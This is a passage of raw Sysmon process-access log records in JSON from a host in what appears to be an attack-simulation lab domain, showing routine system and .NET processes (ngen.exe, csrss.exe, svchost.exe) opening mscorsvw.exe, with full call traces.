ll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.106","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105B1B0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.106\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105B1B0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.106","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105B1B0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.106\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105B1B0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.106","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105B1B0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.153\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.153","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.153\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.153","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.169\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.169","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.278\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 